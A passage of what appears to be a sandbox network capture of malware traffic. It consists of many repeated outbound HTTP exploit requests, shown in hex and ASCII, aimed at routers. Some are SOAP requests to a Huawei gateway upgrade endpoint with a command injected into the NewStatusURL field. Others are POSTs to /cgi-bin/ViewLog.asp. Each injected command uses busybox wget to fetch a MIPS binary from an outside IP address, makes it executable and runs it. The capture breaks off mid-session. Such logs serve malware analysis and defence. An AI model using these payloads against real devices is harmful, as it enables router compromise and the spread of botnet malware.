6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:42.244911909 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:31.394815922 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              189192.168.2.145913494.122.66.2168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:54.816345930 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              190192.168.2.144670631.200.34.2068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:54.919944048 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              191192.168.2.146042495.125.182.2088080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:54.930624008 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:55.168612003 CET137INHTTP/1.1 404 Not Found
                                              Connection: close
                                              Transfer-Encoding: chunked


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              192192.168.2.144990894.110.206.898080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.482381105 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              193192.168.2.144504494.127.131.1908080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.482490063 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:56.518825054 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              194192.168.2.146076895.86.86.198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.510514021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              195192.168.2.145533831.43.191.218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.928335905 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:56.113281012 CET368INHTTP/1.1 404 Not Found
                                              Server: openresty
                                              Date: Thu, 23 Nov 2023 04:15:56 GMT
                                              Content-Type: text/html
                                              Content-Length: 150
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              196192.168.2.144547894.40.124.2508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.948389053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:56.151830912 CET1257INHTTP/1.1 307 Temporary Redirect
                                              Date: Thu, 23 Nov 2023 04:15:56 GMT
                                              Content-Type: text/html
                                              Content-Length: 152
                                              Connection: close
                                              Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self'
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              197192.168.2.145072685.240.170.778080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.953483105 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              198192.168.2.144318831.200.43.2298080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.964021921 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              199192.168.2.143764494.122.63.1238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:55.967997074 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              200192.168.2.144881095.86.124.378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:56.511343956 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:00.774796009 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              201192.168.2.145271294.120.2.1918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:58.949408054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              202192.168.2.144877094.122.73.1088080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:58.953222036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
